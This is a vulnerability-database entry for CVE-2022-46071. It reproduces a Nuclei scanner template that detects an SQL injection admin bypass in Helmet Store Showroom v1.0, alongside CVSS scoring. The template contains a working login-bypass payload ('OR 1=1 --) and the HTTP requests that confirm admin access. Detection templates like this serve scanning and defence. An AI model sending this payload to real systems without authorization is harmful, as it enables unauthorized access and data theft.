Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-46071
HistoryJun 30, 2023 - 7:14 a.m.

Helmet Store Showroom v1.0 - SQL Injection

2023-06-3007:14:02
ProjectDiscovery
github.com
7
cve-2022-46071
sql injection
admin bypass
helmet store showroom site project
sensitive information

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.9

Confidence

High

EPSS

0.04

Percentile

92.2%

There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.
id: CVE-2022-46071

info:
  name: Helmet Store Showroom v1.0 - SQL Injection
  author: Harsh
  severity: critical
  description: |
    There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://yuyudhn.github.io/CVE-2022-46071/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46071
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-46071
    cwe-id: CWE-89
    epss-score: 0.01454
    epss-percentile: 0.86654
    cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: helmet_store_showroom_site_project
    product: helmet_store_showroom_site
  tags: cve,cve2022,sqli,admin-bypass,helmet,helmet_store_showroom_site_project

http:
  - raw:
      - |
        POST /classes/Login.php?f=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username='+OR+1%3D1+--+-&password=1234
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "Helmet Store") && contains(body_2, "Adminstrator Admin")'
        condition: and
# digest: 490a004630440220411e491dd1303ae052dafb68d14917823da18347f38f61fe8f9ed7fbc8dedcd202207e676d9affa4e8fcf42f6b5715534ec57ae860c7394627348a49dca2b82dc0a7:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.9

Confidence

High

EPSS

0.04

Percentile

92.2%

Related for NUCLEI:CVE-2022-46071